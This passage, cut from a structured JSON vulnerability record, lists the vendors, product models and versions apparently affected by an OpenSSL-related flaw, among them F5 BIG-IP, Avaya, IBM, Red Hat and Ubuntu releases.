0.3, "vendor": "ubuntu", "version": "11.10" }, { "model": "enterprise linux es", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "4" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "hardware management console 7r7.2.0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "hardware management console 7r7.1.0 sp4", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "8.1-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "ds8870", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "meeting exchange sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "junos space ja1500 appliance", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "sterling connect:enterprise for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip asm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "proactive contact", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.1" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.8" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "big-ip apm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.1" }, { "model": "ip deskphone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "96x16" }, { "model": "aura system platform sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5" }, { "model": "big-ip ltm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.10" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.2" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "voice portal", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "5.1.3" }, { "model": "big-ip psm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "junos space ja2500 appliance", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "xiv storage system gen3 mtm", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2812-11411.2" }, { "model": "linux enterprise server sp4", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.1" }, { "model": "reflection sp1", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "14.0" }, { "model": "aura communication manager sp4", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux mandrake x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "2010.1" }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.1" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "meeting exchange sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "big-ip apm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "big-ip ltm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.3" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0.0.52" }, { "model": "tivoli netcool/system service monitor fp11", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "big-ip webaccelerator hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "8.2-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "xiv storage system gen3 mtm 11.1.0.a", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2810-114" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.1" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "tivoli netcool/system service monitor fp12", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.0" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.1" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6" }, { "model": "sterling connect:enterprise for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.44" }, { "model": "hardware management console 7r7.1.0 sp3", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.40" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.4" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "project openssl 0.9.8r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "junos space 14.1r1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip ltm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip analytics hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "big-ip link controller hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "8.3-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.4" }, { "model": "tivoli network manager fp7", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.8" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "pfsense", "scope": "ne", "trust": 0.3, "vendor": "bsdperimeter", "version": "2.0.2" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.3" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "big-ip asm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.1" }, { "model": "big-ip ltm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "tivoli netcool/system service monitor fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "junos space 13.1p1.14", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.2.2" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.2" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "meeting exchange sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "project openssl 0.9.8p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "reflection for ibm", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "20070" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.0" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.3" }, { "model": "hardware management console 7r7.3.0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.3" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip gtm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "big-ip ltm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "voice portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "messaging storage server", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "5.2.14" }, { "model": "project openssl 0.9.8s", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "linux enterprise server sp3 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "big-ip analytics hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "sterling connect:direct for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5.01" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "voice portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1" }, { "model": "enterprise linux desktop version", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "4" }, { "model": "linux mandrake x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "2011" }, { "model": "big-ip asm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.10" }, { "model": "meeting exchange sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "project openssl 0.9.8q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.4" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.0" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "11.4" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-453" }, { "model": "big-ip ltm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "project openssl 1.0.0f", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "linux lts sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "8.04" }, { "model": "onboard administrator", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.50" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "tivoli netcool/system service monitor fp10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "8.04" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "onboard administrator", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.55" }, { "model": "big-ip asm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0.0" }, { "model": "messaging storage server sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "messaging storage server sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56001" }, { "model": "big-ip psm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "big-ip apm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip psm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "sterling connect:direct for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5.00" }, { "model": "infosphere balanced warehouse c4000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "big-ip wom hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "big-ip asm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.4" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.1" }, { "model": "project openssl 0.9.8g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "voice portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "jboss enterprise application platform", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5.1.2" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "big-ip webaccelerator hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "meeting exchange sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "tivoli workload scheduler for applications fp02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.04" }, { "model": "big-ip asm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "xiv storage system gen3 mtm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2812-11411.1.1" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4" }, { "model": "meeting exchange", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "jboss enterprise web server for solaris", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "1.0.2" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.2" }, { "model": "xiv storage system gen3 mtm", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2810-11411.2" }, { "model": "big-ip wom hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.3" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "tivoli netcool/system service monitor fp13", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "hp-ux b.11.11", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "tivoli remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4" }, { "model": "big-ip edge gateway hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "message networking sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "linux enterprise server for vmware sp1", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "infosphere balanced warehouse d5100", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "enterprise linux ws", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "4" }, { "model": "big-ip psm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "tivoli netcool/system service monitor fp6", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "big-ip webaccelerator hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "hardware management console 7r7.2.0 sp2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.7" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "aura system manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "project openssl 0.9.8l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip wom hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "messaging storage server sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "big-ip analytics 11.0.0-hf2", "scope": null, "trust": 0.3, "vendor": "f5", "version": null }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "enterprise server x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "big-ip afm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.8" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.2" }, { "model": "big-ip asm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "linux mandrake", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "2010.1" }, { "model": "big-ip analytics hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "jboss enterprise application platform", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.0" }, { "model": "big-ip analytics hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.2" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "enterprise linux hpc node optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "big-ip apm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "onboard administrator", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "3.56" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.12" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "tivoli workload scheduler for applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.3" }, { "model": "enterprise server", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "big-ip psm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip ltm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.1" }, { "model": "project openssl 1.0.0e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "ssl for openvms", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "1.4-467" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "reflection", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "14.1" }, { "model": "infosphere balanced warehouse c3000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4" }, { "model": "big-ip apm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip apm", 